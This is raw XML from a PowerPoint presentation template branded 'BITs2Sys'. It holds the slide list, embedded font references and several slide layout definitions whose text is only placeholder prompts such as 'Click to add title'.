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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId53"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="264" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="282" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="285" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="291" r:id="rId29"/>
    <p:sldId id="292" r:id="rId30"/>
    <p:sldId id="293" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="294" r:id="rId34"/>
    <p:sldId id="295" r:id="rId35"/>
    <p:sldId id="281" r:id="rId36"/>
    <p:sldId id="296" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="298" r:id="rId39"/>
    <p:sldId id="304" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="302" r:id="rId43"/>
    <p:sldId id="263" r:id="rId44"/>
    <p:sldId id="303" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="309" r:id="rId47"/>
    <p:sldId id="306" r:id="rId48"/>
    <p:sldId id="308" r:id="rId49"/>
    <p:sldId id="307" r:id="rId50"/>
    <p:sldId id="310" r:id="rId51"/>
    <p:sldId id="260" r:id="rId52"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="JetBrains Mono" panose="02000009000000000000" charset="0"/>
      <p:regular r:id="rId57"/>
      <p:bold r:id="rId58"/>
      <p:italic r:id="rId59"/>
      <p:boldItalic r:id="rId60"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
      <p:regular r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" charset="0"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="等线" panose="02010600030101010101" charset="-122"/>
      <p:regular r:id="rId66"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId6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638" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3966" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3864" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="38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4301" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1899" y="279"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="638"/>
        <p:guide orient="horz" pos="3966"/>
        <p:guide orient="horz" pos="3864"/>
        <p:guide pos="3846"/>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59" d="100"/>
          <a:sy n="59" d="100"/>
        </p:scale>
        <p:origin x="2517" y="1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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.fntdata"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font5.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font3.fntdata"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2.fntdata"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><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23481F-9C3C-43D7-90C7-EB1A27D547E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9E64D8-EEBF-48B9-91B2-83B08DE2D2AC}"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E16C2-E655-40A9-A15C-8E8419011105}"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69313-2D9F-4019-9186-E48C7C044353}"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369313-2D9F-4019-9186-E48C7C044353}"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flipV="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11220450" y="797719"/>
            <a:ext cx="298450" cy="234608"/>
            <a:chOff x="11040268" y="797719"/>
            <a:chExt cx="478632" cy="234608"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle: Rounded Corners 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="797719"/>
              <a:ext cx="478632" cy="648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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle: Rounded Corners 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="967456"/>
              <a:ext cx="478632" cy="64871"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660398" y="1497031"/>
            <a:ext cx="8724902" cy="2507817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="4453591"/>
            <a:ext cx="10858500" cy="508703"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4294967294"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001013" y="5859780"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Presenter name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660398" y="5859780"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="徽标&#10;&#10;描述已自动生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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3627" y="173990"/>
            <a:ext cx="10858500" cy="900112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="1264204"/>
            <a:ext cx="10858500" cy="4869896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BITs2Sys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matchingName="Agenda">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0400" y="1500187"/>
            <a:ext cx="2836562" cy="915667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745078" y="1500188"/>
            <a:ext cx="7773821" cy="4633912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>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ltLang="zh-CN"/>
              <a:t>Click to add text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C8BB1146-E542-4D4E-B8E9-6919A11DDD48}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621019" y="1500188"/>
            <a:ext cx="0" cy="4633913"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="3175" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform: Shape 8"/>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2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>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flipV="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11220450" y="797719"/>
            <a:ext cx="298450" cy="234608"/>
            <a:chOff x="11040268" y="797719"/>
            <a:chExt cx="478632" cy="234608"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="797719"/>
              <a:ext cx="478632" cy="648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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle: Rounded Corners 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11040268" y="967456"/>
              <a:ext cx="478632" cy="64871"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368675" y="2568601"/>
            <a:ext cx="5435600" cy="987399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3375025" y="3556000"/>
            <a:ext cx="5435600" cy="2578100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">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add text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C8BB1146-E542-4D4E-B8E9-6919A11DDD48}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="徽标&#10;&#10;描述已自动生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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2722" y="173990"/>
            <a:ext cx="10858500" cy="900112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder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A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder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matchingName="Closing">
  <p:cSld name="Closin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flipV="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11220450" y="797719"/>
            <a:ext cx="298450" cy="234608"/>
            <a:chOff x="11040268" y="797719"/>
            <a:chExt cx="478632" cy="234608"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle: Rounded Corners 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
